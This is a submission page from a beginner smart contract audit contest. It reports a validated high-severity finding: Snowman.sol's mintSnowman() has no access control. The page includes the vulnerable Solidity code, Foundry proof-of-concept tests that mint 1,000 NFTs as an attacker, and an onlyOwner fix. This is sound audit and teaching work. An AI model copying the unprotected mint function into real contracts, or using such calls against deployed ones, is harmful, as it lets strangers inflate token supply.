Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
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Submission Details
Severity: high
Valid

Missing access control on mintSnowman() allows any user to mint unlimited Snowman NFTs|

Root + Impact

Description

  • The protocol allows Snowman NFTs to be minted through the mintSnowman() function.

  • However, the function does not implement any access control, allowing any external user to call it and mint arbitrary amounts of Snowman NFTs to any address.

  • This breaks the intended supply control mechanism and allows unauthorized inflation of the NFT supply.

// Root cause in the codebase with @> marks to highlight the relevant section
function mintSnowman(address receiver, uint256 amount) external {
@> for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood:

  • Any user can directly call mintSnowman() without requiring authorization

  • The function can be repeatedly called by attackers to mint unlimited Snowman NFTs

Impact:

  • Unauthorized users can inflate the total Snowman NFT supply

  • The intended minting restrictions and token economics can be bypassed

  • NFT ownership distribution can be manipulated by arbitrary users


Proof of Concept

The test demonstrates that an unauthorized user can call mintSnowman() directly and mint Snowman NFTs without any permission check. The attacker is able to increase another user's NFT balance, proving that the minting functionality lacks access control.

function test_unauthorizedMint() external {
vm.startPrank(alice);
snowman.mintSnowman(bob, 1);
assertEq(snowman.balanceOf(bob), 1);
console.log("Bob Snowman balance:");
console.logUint(snowman.balanceOf(bob));
}

Mitigation

Restrict access to mintSnowman() so only authorized roles (e.g., owner or admin) can call it. This ensures NFT minting is controlled and prevents arbitrary users from inflating the supply.

+ modifier onlyOwner() {
+ require(msg.sender == owner(), "Not authorized");
+ _;
+ }
- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

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